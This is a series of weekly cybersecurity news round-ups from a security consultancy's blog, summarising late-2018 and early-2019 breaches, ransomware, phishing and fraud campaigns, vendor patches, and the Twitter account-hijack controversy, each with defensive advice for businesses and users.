According to a blog by TrendMicro, the MongoLock ransomware that was targeting unprotected MongoDB databases in mid-2018, has a new variant that acts more like wiper malware than ransomware.Although this new version of MongoLock doesn’t delete the whole contents of the systems hard drive (like traditional wiper malware), upon infection it immediately scans the system and starts to delete important data files instead of encrypting them.MongoLock scans and deletes files and folders from typical locations such as Documents, Desktop, Recent, and Favourites, while also hunting out any backup volumes and deleting their contents. A ransom note is copied to the infected machine, informing the victim that their files and database have been copied to their secure servers, and by sending the attackers 0.1 Bitcoin you can recover your lost data.Unfortunately, this is not the case, analysis by the Trend Micro team found that any deleted files were unrecoverable. As mentioned above, always ensure that your have a robust backup process in place, as you will need it if you want to recover from a MongoLock infection.For more info the Trend Micro blog can be found here.And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #24 – 11th January 2019
By
Stuart Hare
on
10/1/19
Happy new year and welcome to the first Ironshare Cyber Round-up of 2019. We look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.In this week’s round-up:
Well we didn’t have to wait long for the news of 2019’s first reported data breach.Within 24 hours of the new year celebrations, the Victorian Government in Australia reported that it had detected unauthorised access to its Government Directory resulting in the details of 30,000 public servants being compromised. The breach is believed to have been accomplished after a successful email phishing attack on a government employee.The Victorian Government Directory contains the work and contact details of its employees including name, job roles, email addresses and phone numbers. Fortunately, the breach did not involve the compromise of any financial information.An email to staff read:
‘On 22 December 2018 an unauthorised third party accessed and downloaded a partial copy of the Victorian government employee directory, which identified approximately 30,000 public service staff and contractors. It appears the third party accessed the list after compromising an employee’s email account.’
Although information, like that leaked here, may be found through other online sources (i.e. social media, LinkedIn etc.), businesses should be aware that malicious actors can use this information to understand the structure of an organisation, and use it to launch a more targeted attack, such as Business Email Compromise.If you haven’t thought about this already, start your new year with an audit of your business’s security. Understanding where your risks and vulnerabilities are, will help you to plug the gaps and reduce the opportunities for the bad guys to exploit your systems and data.https://www.abc.net.au/news/2019-01-01/victorian-government-employee-directory-data-breach/10676932
DataResolution.net was sent an unwanted gift on Christmas Eve in the form of the RYUK Ransomware. Since then, the cloud hosting provider has been working to bring its systems back online and restore service for its 30,000 customers.An update was provided to customers on 29th December stating that attackers used a compromised account to access the Data Resolution systems, giving them access to the data centres domain. This allowed the actors to lock out access to the company systems, before moving quickly to infect servers with the RYUK ransomware.This was not the only report of RYUK infections over the Christmas period with multiple major US news publishers, reportedly suffering the same fate.In an update to their customers, Data Resolution was quick to blame North Korea for the attack, stating they had hit 150 banks in the last year. How they can so confidently attribute this to an actor or group, when they are still in the process of recovery is odd, but we assume that this is simply due to the Checkpoint report released in August last year, that associates this ransomware with the notorious North Korean Lazarus group.As of the 2nd January most of the providers services are still pending or in the process of recovery.https://krebsonsecurity.com/2019/01/cloud-hosting-provider-dataresolution-net-battling-christmas-eve-ransomware-attack/
In an attempt to highlight flaws in the Twitter social media platform, security firm Insinia Security, briefly hijacked a number of high-profile twitter accounts.Insinia have been warning about the problems of using SMS text messaging for some time, and in late December decided to publicise the issue by taking brief control of celebrity twitter accounts that included Eamonn Holmes and Louis Theroux.The Twitter flaw in question allows anyone with your phone number to tweet to your account. By understanding how Twitter handles incoming texts from a phone number, Insinia were able to post to and fully control a hijacked account. As part of the process they posted a tweet stating that the hijacked account was now under the control of Insinia Security.These actions have led to mixed feelings across the security community. Some feel happy in that this was necessary to get Twitter to take action and force a fix to this known flaw. The majority though appear to feel that this act was unethical and irresponsible.As Insinia gained unauthorised access to twitter accounts, there are grounds that their actions were also potentially illegal, committing an offence under the computer misuse act, which shines a bad light on the security research community.Insinia stand by their decisions and state that no unethical or illegal actions were taken to prove this flaw. They highlight that these methods can easily be used to spread fake news, carry out social engineering, damage reputations and distribute malware.If you are concerned that you could be directly affected by this flaw, then it is recommended to remove your phone number from your Twitter account.BBC Report: https://www.bbc.co.uk/news/technology-46700995Insinia Blog post: https://medium.com/insinia/this-account-has-been-hijacked-temporarily-4909fa190f5d
January is Tax Return season in the UK, so please be aware that there are a number of tax related scams in circulation. These scams come in the form of genuine looking phishing emails, but more commonly we are seeing cold calling used as the delivery method.The aim of these scams is to steal your personal information and identity, but can also lead to stealing money from your bank accounts.These automated telephone cold calls threaten the victims with arrest and legal action due to unpaid tax bills, in order to get them to call a fake HMRC number so the bad guys can steal their information.If you receive one of these scam emails or phone calls, never call these numbers or click on the links in these fake emails, always go direct to the HMRC website for the real contact details.Although HMRC do contact taxpayers by automated phone calls for late bills etc. they will never threaten legal action or arrest, and they will always include your unique taxpayer reference number in any contact with you.For guidance on how to recognise real HMRC contact please see the official website.As always, remain aware to stay safe online.And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #23 – 4th January 2019
By
Stuart Hare
on
3/1/19
Welcome to the Christmas edition of Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
An email phishing campaign has been seen doing the rounds, which is targeting Apple users by pretending to be a receipt for a purchased item on the app store. The email arrives stating confirmation of the purchase and invites you to check the attached PDF document for details.This type of attack is relying on the user’s shock factor to react and open the attachment on the basis that they haven’t made such a purchase on the app store. Although the initial email is not the most convincing phish seen, the rest of the attack that follows is. The PDF receipt at first glance looks legit but contains a number of shortened links that redirect to the phishing site.A victim that clicks on a link to report an incorrect purchase, is sent to a site identical to the real Apple web pages and although the web address does not belong to Apple it is marked as Secure, so could trick users into thinking it’s a valid Apple site.The attackers start by requesting the Apple ID and password, which once entered sends the victim to another page that informs them their account has been locked for security reasons. In fear that their account has been hacked the victim may continue to try and unlock their account, sending them to another Apple looking page, where the actors then look to gain more personal information including full name, address, payment information, security questions etc.Once all the information has been entered and submitted a new page appears to confirm that the account has been verified and states it will automatically log you out. The really sneaky part then comes when the phishing site redirects to the real Apple login page and displays a warning that the session was timed out for your security. We believe that this is to try and convince the victim that all is now well, when in fact the actors now have enough information to carry out identity theft and fraud against the victim.To protect yourself from these phishing threats:
For more details on this campaign including example screenshots of the email, receipt and phishing site, please see Lawrence Abrams Bleeping Computer post on the topic.
A recent post by Proofpoint has highlighted a significant rise in email fraud and targeted email attacks this year, with stats showing an 80% increase in Q3 based on the previous year. Email fraud is a targeted method of attack that includes techniques such as Business Email Compromise (BEC).Business Email Compromise (aka a BEC scam) involves the attackers spoofing an email to make it look like it came from a company executive and aims to convince staff at lower levels of the organisation to part with company funds. It is reported that BEC fraud targeting just 9 US companies has resulted in losses of approximately $100 million.Proofpoint’s analysis of these worldwide attacks shows that companies have been targeted with an increasing frequency each quarter of 2018. Proofpoint state that the proportion of companies that were targeted by more than 50 BEC attacks in a quarter nearly doubled - from 11% to 20% - over the previous year.Malicious actors use multiple techniques to carry out these types of attacks, including Email Display name spoofing, Domain spoofing and Lookalike domains.With these types of email threats continuing to pay dividends to attackers, it is important that your organisation ensures they are protected. Strong email defences are required that use Email Security solutions such as Cisco Email Security, and incorporate technologies such as SPF, DKIM and DMARC that can help to prevent spoofing.As a precaution if you receive an email such as this from one of your executives, always confirm in person that they have sent it and their instruction is legitimate.
SplashData, the makers of password manager software SplashID and TeamsID have recently released their 8th annual worst password list. The list is based on their analysis of over 5 million passwords that have been leaked on the internet, through the constant flurry of data breaches and attacks that continue to plague companies worldwide.Topping this list as the worst most used password, for the 5th year in a row is ‘123456’, with the following rounding out the top ten.
This makes for depressing news, especially in the light of the continued reports of data, privacy and account information breaches, users are still not learning that better password security is required to protect their personal information.Users are advised to follow good practice when creating new passwords:
Only a week after the scheduled monthly patch Tuesday release of security updates, Microsoft has been forced to release an unscheduled patch for a zero-day vulnerability in its Internet Explorer browser.Google were responsible for bringing this vuln to Microsoft’s attention, reporting that this is being actively exploited in targeted attacks.The vuln exists due to how the browsers scripting engine handles objects in memory. By exploiting the corrupted memory an attacker can remotely execute code on the target machine, as the current logged in user. If the user has administrative rights to the machine, the attacker could take full control of the vulnerable system.Information on the vulnerability and its associated security update can be found here.To prevent your computer systems and organisations from compromise, it is recommended that all systems not configured to auto-update have this update applied immediately.
The Windows Defender Security Intelligence team have identified a number of holiday themed greeting emails, reported via their twitter feed. These emails distribute a variant of the destructive Emotet virus family using office documents pretending to be Christmas Greeting cards.The team has witnessed a campaign from the Emotet gang with emails titled ‘Christmas email greetings’ that contain attached word documents such as ‘Christmas-greeting-card.doc’ and ‘Christmas eCard.doc’. Each attachment includes the Emotet trojan payload, identified by MS as Trojan:Win32/Emotet.AC!.Emotet started life some time back as a banking trojan but has since evolved to become a distributor of more malicious and destructive threats, such as network worms and wiper malware.Look out for these malicious emails and ensure you have active anti-virus / anti-malware protection in place on all your computer systems, which is kept up to date at least daily, to protect against this threat. And as always never open any email attachments unless you are certain they are from a trusted source.Ironshare wish you all a very Merry Christmas and a Happy New Year.Remember - always stay safe and secure.And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #22 – 21st December 2018
By
Stuart Hare
on
20/12/18
Research carried out by the SANS ISC team has found a new Phishing attack in the wild that targets Microsoft Office 365 users, through the use of fake Non-Delivery Report (NDR) emails.NDR’s are sent to let you know that there has been an issue with delivering an email you have sent and provides information on why the email delivery was unsuccessful.This phishing email imitates a real Microsoft NDR in an attempt to steal the users Office 365 login username and password.Below is an image of a real NDR email from Microsoft:
The image below shows what the fake NDR email looks like:
At first glance this is a very convincing and has the potential to trick most people who do not look more closely into the email. Clicking on the Send Again link redirects the user to a phishing website that mimics the login page for Microsoft.The image below shows the fake login page:
If the user continues to enter their login details into this site, then the attacker has been successful in stealing the credentials of the users Office 365 account. This account should now be deemed as compromised, and immediate actions are required.
If you receive what you believe to be a fake email, look out for the following:
User education on these types of phishing threats combined with good technology controls can help to prevent these types of attacks from impacting your business.
Ironshare – Security Simplified
By
Stuart Hare
on
13/12/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
A recent survey commissioned by RedSeal found that Business in the UK is generally feeling let down by the Government when it comes to Cyber Security.The research took place during November 2018 and sought the insight of over 500 UK IT professionals at Director Level and above. This research revealed some key concerns for UK businesses:
These numbers provide more evidence that UK business is not doing enough to protect themselves when it comes to Cyber and Information Security. We see a new headline in the news every week, highlighting another data breach or cyberattack that results in huge costs and implications for the companies involved.Business owners and senior managers, for organisations large or small, need to understand the importance of having a strong security strategy, that’s aligned and proportionate to their overall business objectives.The National Cyber Security Centre (NCSC), a division of the UK intelligence service GHCQ, was established by HMG in 2016 to provide such support for the public and private sector organisations, as well critical national infrastructure.Although the NCSC has made great steps forward with providing simple advice and guidance to help protect the UK from cyberattack, it is clear through this survey, and our engagement with Small to Medium businesses that more needs to be done, as the large majority still do not know about NCSC or what they offer.We believe that the NCSC are on the right track, but it seems they still have some way to go before they become a household name and truly have a positive impact in helping to secure the UK and its businesses.
Research carried out by the SANS ISC team has found a new Phishing attack in the wild that targets Microsoft Office 365 users, through fake Non-Delivery Report (NDR) emails.We have witnessed many phishing emails in the last year related to Office 365, but so far none that look this convincing, and none that have used this NDR method.Check out our short blog on this phishing threat, which includes what to do, what to look for and how to prevent this threat from compromising your Office 365 service.https://www.ironshare.co.uk/security-advisory/office-365-phishing-non-delivery-notifications/
Tuesday 11th December saw the release of Microsoft’s scheduled monthly security updates. Included in this month’s release were a total of 9 Critical and 29 Important security updates.The release covers updates in Windows, Office Products, Internet Explorer & Edge browsers, the .Net framework and the Chakra scripting engine.5 of the 9 Critical vulns, relate to memory corruption issues in the Chakra scripting engine, and how they are handled in the memory of the Edge browser. These can be exploited by tricking a user to visit a specially crafted web page and allows the attacker to launch remote code on the victim’s machine.A critical remote code execution vulnerability also exists in the Windows DNS Server component when it fails to handle DNS requests properly. By sending malicious requests, an attacker can exploit this vuln and run arbitrary code under the local system account on Windows servers (2012 and later) that are configured with the DNS server feature.Rounding out the critical updates are memory corruption vulns in the Internet Explorer and Edge browsers, and a remote code injection vuln in .Net framework, that can lead to an attacker hijacking an affected system.Staying up to date with security patches for your operating systems and software, is a critical part of delivering and maintaining a strong security posture, please ensure you test and update as quickly as possible to prevent exploitation and stay secure.The December Patch Tuesday release notes can be found here while the Security Guidance and CVEs can be found here.
Adobe have released a security bulletin for a number of critical and important vulnerabilities in Acrobat Reader that were discovered by research teams in Cisco Talos, Trend Micro and Palo Alto Networks.Adobe Acrobat Reader stands as the most popular PDF reader in use today and is an integrated part of common web browsers such as Google Chrome and Microsoft Edge.When exploited these vulnerabilities can allow an attacker to launch malicious code execution under the context of the logged in user.Security updates are available for the affected products in both Windows and MacOS. Updates should be performed automatically by the product in most situations, but please verify these have been completed, especially in enterprise environments where direct internet access is not permitted, and auto updates may not complete successfully.
Our final message for this week continues to spread the word of staying clear of scams and fake purchases while shopping online for those coveted Christmas gifts. With one in five people being scammed when buying Christmas presents online, we expect to see another increase this year, which could eclipse the £11million online fraud of Christmas 2017.Check out our previous round-up posts on the 23rd November and 30th November, where we discussed the pitfalls of Holiday Season scams and what to look out for.Please be aware of the heightened threat of fraudulent activities during the weeks before, and directly after Christmas, and follow the advice provided by Action Fraud and our previous posts above.Remember that if the deal looks too good to be true, its likely to be fake.If you have been a victim of fraud, it is important to ensure that you report it to Action Fraud either online or by calling 0300 123 2040. #fightfestivefraudAnd that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #21 – 14th December 2018
By
Stuart Hare
on
13/12/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
We have seen more big data breaches in the last week starting with the Marriott Starwood hotel chain that hit the news on Friday. With up to half a billion customers impacted, this stands as one of the largest breaches of personal information we have seen to date.The Marriot posted a notification on its news center website stating that an ongoing security investigation had determined that the Starwood properties customers database had been accessed by an unauthorised party. Worryingly they found this unauthorised access had been in place for approximately 4 years, and during this time the actors had managed to both copy and encrypt data in order to extract it from the company’s network.The leaked personal information included, names, addresses, email, passport numbers, arrival and departure info, as well as credit card information.The Marriott are working with law enforcement, and on a rolling basis are contacting customers that may be affected by the breach. A dedicated website has been setup to address questions that customers may have: https://info.starwoodhotels.com/.Following this were reports that the Q&A website Quorasuffered a similar incident that has resulted in the compromise of personal information for approximately 100 million users.Unauthorised access to one of their systems was gained by a malicious third party, with the possibility that they have managed to access all user account information, public & non-public content, and the users encrypted passwords.Quora are contacting affected users by email, while also providing an FAQ help page to answer questions in more detail.If you believe you are affected by the breaches above, check your email for direct information from the company; contact your bank or credit card company to inform them and seek guidance on replacing your cards; and as a precaution replace your passwords for these sites, and any sites where you may have used the same email and password combination.Importantly if you have used the same password elsewhere, make sure change those too, and remember, Never use the same password twice.
Staying with the Holiday Season theme of our last posts, we continue to spread the word of protecting yourselves online during the festive period. We kick started this with our previous round-up posts on the 23rd November and 30th November, where we discussed the pitfalls of Holiday Season scams and what to look out for.On the basis that anyone of us could fall victim, Action Fraud in the UK, in conjunction with the City of London Police have launched the Fight Festive Fraud Campaign, to educate the public about the perils of online shopping fraud.Action Fraud report that during the 2017 Christmas period over 15,000 shoppers were conned by fraudsters to the sum of approx. £11 million. Deals on electronics such as mobile phones and computer devices continue to be the most profitable for the fraudsters.Please be aware of the heightened threat of fraudulent activities during the weeks before, and directly after Christmas, and follow the advice provided by Action Fraud and our previous posts above.Remember that if the deal looks too good to be true, its likely to be fake.If you have been a victim of fraud, it is important to ensure that you report it to Action Fraud either online or by calling 0300 123 2040.
The 360 Threat Intelligence Team have released a technical post on newly discovered APT attacks that take advantage of a zero-day vulnerability in Adobe Flash to compromise the victim. The attacks use malicious word documents that are embedded with the 0-day exploit, infecting the target system by deploying a Remote Access Trojan (RAT) that can be used to gain access and control the compromised target.The Word document is sent to the victim via email attachment that when downloaded, executes the exploit code and deploys the RAT, before registering with the Command and Control service.Once installed the RAT uses stealth techniques by pretending to be a valid Nvidia graphics card or Microsoft OneDrive program, but investigation into the executables show that the digital signatures have been revoked, thus are not valid.Adobe have released a patch for this vulnerability that can be downloaded from from their website.Users should always look to keep their software and operating systems up to date with the latest versions / patches and NEVER click on attachments unless they are expected and from a trusted source.
Cyber criminals are continually evolving their techniques, tactics and procedures, to ensure that attacks gain increased levels of success while avoiding detection for as long as they can. Coupling this with the realisation that the longer they remain undetected on a compromised device, the more profit they gain, has driven this need for continuous improvement and change.Fileless malware although not new, has become a key malicious component in not only avoiding detection but also maintaining persistence on an infected device. Unlike file-based malware, Fileless attacks do not have to touch the disk, allowing them to avoid detection by traditional security defences such as signature based Anti-virus.A report by Malwarebytes Labs estimates that attacks using Fileless malware have accounted for approximately 35% of all attacks in 2018 and they are almost 10 times more likely to be successful in comparison to file-based attacks.Many threats in the wild are currently using these advanced techniques, including the notorious Emotet banking trojan botnet and the ransomware variants SamSam and Sorebrect, all causing major damage around the globe. While Sorebrect is completely fileless, the others use fileless techniques to maintain post infection persistence or perform malware dropper functions.Common Fileless techniques include the use of PowerShell to launch administrative scripts on the infected system. Such PowerShell commands can be masked using Base64 encoding and hidden in the registry to be run later in memory.If you are worried about the threat of Fileless malware compromising your company infrastructure, then you should really consider an Advanced Malware solution such as Cisco AMP for Endpoints, to defend against this threat.
For some time now there has been talk around the security concerns of having Chinese products in the core of western national infrastructure or sensitive networks. These concerns have been based upon the likelihood that products may have been modified for the benefit of the Chinese government, to assist in acts of espionage or state sponsored cyber attacks.BT have confirmed that equipment made by Chinese tech firm Huawei will be not be used in the core infrastructure of the new 5G mobile network. In addition to this they have also stated that all Huawei kit will be removed from the existing 3G & 4G networks.BT have had a long relationship with Huawei dating back to 2005, and although this decision around not using their core network products has been made, BT will continue to work with Huawei for antennas and other non-critical devices.This follows similar moves by the US, Australia and New Zealand governments to restrict Huawei from their 5G networks, on top of the mounting pressure from UK intelligence services for a decision to be made on whether the UK will continue to use, and trust Chinese owned technologies.https://www.bbc.co.uk/news/technology-46453425And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #20 – 7th December 2018
By
Stuart Hare
on
6/12/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
Following on from last weeks round-up, where we warned about the increased threat of online shopping scams, Carbon Black have released a Holiday Threat Report on this years expected rise of cyber attacks.According to the report, the Carbon Black Threat Analysis Unit (TAU) are expecting to see an increase of up to 60% in attempted cyber attacks in the run up to and during this year’s festive period. This increase is based on the intelligence gathered from their platform of 16 million protected endpoints, that saw a 20% increase in 2016 and a 57% increase of attempted attacks in 2017.Analysis for 2017 shows a steady increase in attacks between Black Friday and Christmas Day, with the peak number of attacks occurring between Christmas day and New Years day, coinciding with the post-Christmas / boxing day shopping sales.Shoppers are not the only target during this time of year though, businesses are equally in the cross hairs of attackers, as they look to expose them during this very busy period, when they are likely to be overworked, understaffed or both.General Email Phishing attacks, along with more targeted Spear-phishing attacks remain the most common delivery of malware that leads to a successful compromise.Remember to always keep an eye out for fake emails; look for spelling and grammatical errors; never click on a link or download an attachment unless you know for certain it’s from a trusted source; and if you receive an email from a company manager or director asking for you to do something unusual then ensure you follow-up with them in person or via phone to confirm it’s not a scam.
There has been a lot of press reports recently on the growing rate of Sextortion scams currently doing the rounds.Sextortion scams try to convince the victim that they have been recorded while visiting adult websites and demands a ransom to prevent the attacker from sharing the footage with friends and family.BBC reporter Jo Whalley became a target, and although she knew that this must be a scam, she was surprised to find her real password provided by the scammers.The video report on her investigation (linked below) provides a good summary of the scam, and how to check whether your password has been leaked, using Troy Hunt’s ‘Have I been Pwned?’ service.https://www.bbc.co.uk/news/av/stories-46323625/what-happened-when-sextortion-scammers-targeted-a-bbc-trending-reporter
Last week a vulnerability was disclosed in the One Planet York mobile application, that leaked the personal details of approximately 6,000 York residents. The One Planet York app, run by the York City Council, gave users information and advice on the local recycling and bin collection services.A security researcher at RapidSpike found that when simply accessing the Leaderboard feature on the app, the API that powers the feature pushed the personal data of the current Top Ten users directly to the app in plain text (unencrypted and readable).The pushed data included names, addresses, email, phones numbers, the users hashed password and the salt (a random piece of data used to increase the security of stored passwords). So far all very bad.York Council worked with the application developers, quickly removing the app and its associated servers to prevent further data leakage. It has since been decided that the app will not be reintroduced, and users were advised to remove the app from their devices.This week the situation took a dark turn when the City of York Council, reported the unnamed RapidSpike researcher to the police, claiming that they were not responsive, and it appeared to them that deliberate unauthorised access was used to determine the data leak.RapidSpike have since responded with a post of their own, standing by the researcher, who not only followed the Councils own responsible disclosure guidelines, to inform them of the issue, but also responded within 18 mins of receiving an email from the Council.An important point is that the researcher only had to access the Leaderboard feature and view the response, to access the data, meaning no vulnerabilities were exploited.This always is a possible risk when it comes to security research, and a scary position for the researcher who did the right thing to privately report the leak.A huge positive was the support from the North Yorkshire Police Cyber Crime unit who responded via their twitter account: “We are aware of the York 'data breach' but please be reassured we don't regard this incident as criminal. We recognise the benefits of software vuln disclosure as part of a healthy security environment and the researcher has acted correctly.”
The latest blog post from the Talos Intelligence team covers a newly discovered campaign that’s been in operation across the Lebanon and the UAE, which to date has targeted government domains and a private Lebanese airline.As its stands Talos believe this is a new actor or group, that is using fake malicious websites to advertise job opportunities to compromise its targets. The malware uses macro-embedded Office documents to deliver its payload, requiring the human victim to enable macros for the exploit to be deployed.The malware dropped contains a Remote Administration Tool (RAT) and DNS capabilities for redirecting DNS traffic as well as tunnelling Command & Control traffic over DNS channels.The DNS redirection attack has resulted in multiple public sector name servers being compromised, with the attackers repointing hostnames to IP addresses they control, in order to gain information such email or VPN credentials.In summary this appears to be a new advanced threat actor or group, focused on hitting important targets. Organisation's should ensure that they have strong protection in place to defend against this and similar threats. Cisco's Umbrella and AMP for Endpoints security products provide the ideal protection against this type of threat.The link below contains the full detailed technical information of the campaign including IOCs:https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlAnd that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #19 – 30th November 2018
By
Stuart Hare
on
29/11/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
The holiday season has officially kicked off and these days it all starts with Thanksgiving Day in the US. The online shopping frenzy begins with the Black Friday sales, runs through Christmas and typically concludes in the New Year at the end of the Boxing Day sales ( or it does in the UK at least ).With the increase in online spend comes the inevitable online shopping scams that try to steal your personal information and credit cards details. As more and more people seek out the ultimate shopping deal, it is easy to lose focus and fall foul to one of these scams that promise the best deal or biggest discounts on products.Black Friday sales started the end of last week in the UK, and by the weekend we had already seen several scams hitting social media. Be aware that these scams can be delivered using a number of different methods, including email, fake web pages, fake Facebook posts and pages, fake smartphone apps, hoax coupons and gift cards, and WhatsApp / SMS messaging campaigns.Email phishing and spam campaigns remain the biggest source of Cyber threats today, and this is no different here. Talos Intelligence report that last year, 71% of emails that included references to Black Friday and the following Cyber Monday sales, were classified as spam.Messaging platforms such as WhatsApp are also not immune. One such scam that has been circulating advertises huge discounts of up to 99% with Amazon but redirects its victims to a fake page in order to steel their information.As always please stay vigilant, especially through this heightened period. Below are a few pointers to try and stay safe:
Stay safe and Happy shopping.
Amazon have been contacting certain customers in the US and UK this week, informing them of a technical error on the website that has leaked their name and email address.Hello,
We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.
Sincerely,
Customer Service
http://Amazon.comFirst impressions of the customers receiving this email (shown above) were that it was suspicious, looking potentially like a bad phishing email, which essentially is missing a link to the phishing site. The email content is very brief and provides no real information into what has occurred. Even Amazon’s own customer service department, when contacted, thought this was a phishing attempt.After some digging it was found that this is in fact a real email from Amazon. Amazon themselves have confirmed the leak, reporting that the issue has been resolved and that all customers impacted by this information disclosure have been contacted.According to Amazon this is not the result of a customer’s actions and there is no need to change your password, if you were a customer that was impacted.Amazon need to take a close look at their notification process to ensure that future emails do not look like just another scam.
Magecart has struck again, this time attacking the website of Vision Direct, an online provider of contact lenses. The attack has resulted in the loss of data for any users that created accounts, logged in or made payments on VisionDirect.co.uk between the 3rd and 8th November 2018.Stolen data included both personal and credit card information that was made during updates to accounts or when completing online purchases. Unfortunately, full credit card information including CVV numbers for Visa, Mastercard and Maestro cardholders will have been compromised.Magecart works by embedding a 3rd party Java script into the web pages of the compromised site, it collects input data from online forms, which is then syphoned off to a remote Command and Control (C2) server.As this is a real time capture of information any existing information that was stored in the Vision Direct database will not have been compromised. Vision Direct have confirmed that the incident has since been resolved, and they are contacting those customers impacted by this issue directly.If you believe you have been affected by this breach, you should reset your account password and report it to your credit card provider, so your cards can be cancelled and replaced.A Tripwire blog post recently stated that 20% of online stores compromised by Magecart are likely to be re-infected within days of cleaning up the previous infection, with one store reportedly being infected up to 18 times.If you are running an online payment site, you should seriously consider running Content Security Policy (CSP) and Subresource Integrity (SRI) to control the scripts that run on your website in order to prevent untrusted scripts from being injected.For more information Scott Helme has some excellent technical blog posts on this subject.Link to Vision Direct Data Theft notification: https://www.visiondirect.co.uk/customer-data-theft
It seems that not even Dark Web sites are immune from hacking these days. A popular Dark Web hosting provider, Daniel’s Hosting, has been crippled by an attack, taking down the entire service which hosted more than 6,500 websites.The hack reportedly took place on the 15th November, where a malicious actor got access to the backend database and deleted all accounts, including the root account. As this service was responsible for hosting nefarious websites such as malware operations, comand and control services etc. it is a matter of opinion whether this act was a good or bad thing.Daniel Winzen, the guy responsible for running what was the largest hosting service on the Dark Web, has stated that all data for the hosted sites is now lost, and that he might re-enable the service once the vulnerability has been identified and resolved.It is not yet clear what vulnerabilities may have been exploited to accomplish this attack, but a zero-day PHP vulnerability, which gained attention the day before, could have been a candidate.This is not the first time a Dark Web hosting service has been the victim of a take down. In 2017 the hacktivists Anonymous took down the Freedom Hosting II service.https://www.zdnet.com/article/popular-dark-web-hosting-provider-got-hacked-6500-sites-down/And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #18 – 23rd November 2018
By
Stuart Hare
on
22/11/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
Over the last few weeks, an increasing number of cryptocurrency scams have been seen on the Twitter social media platform, using numerous compromised accounts. These scams try to trick users into handing over a small amount of cryptocurrency (such as Bitcoin), to receive a much larger amount of the currency in return, but all this does is fill the scammers wallets and fund further campaigns.Scammers are compromising twitter verified accounts that are then used to deliver these scam tweets. The concern here is that Twitter accounts with the Verified (blue & white tick) badge are supposed to provide an element of trust, as it is displayed to indicate that the account has gone through Twitter’s approval process to ensure that the account is authentic.We first witnessed this when a promoted 'Ad' tweet from Elon Musk told the community that he was giving away 10,000 Bitcoin. A closer look at the account confirmed this was actually the verified account of film studio Pathe UK, and the display name and image had been changed to make it look like it was coming from Elon Musk. To really sell it they even retweeted genuine tweets from the Elon Musk’s real account.This has not been the only instance of this scam; UK retailer Matalan and Google’s G Suite have also had their accounts compromised, and this week we saw Target become the latest victim when their account was briefly hijacked. @Target tweeted:
Early this morning, our Twitter account was inappropriately accessed. The access lasted for approx. half an hour & one fake tweet was posted during that time about a bitcoin scam. We have regained control of the account, are in close contact with Twitter & are investigating now.
Please don’t get drawn into these scams, as they will not increase the size your crypto wallet, they just fund the bad guys to continue these types of campaigns.To prevent your Twitter accounts from being hijacked, use complex and unique passwords that are not used anywhere else, and ensure that Two Factor Authentication (also called Login Verification) is enabled.Whether Twitter are doing enough to assist with or prevent these activities is debatable, but they should be looking to put measures in place to further protect their users accounts. Industry experts such as Graham Cluley have suggested the mandatory use of 2FA, which sounds like a great start to us!
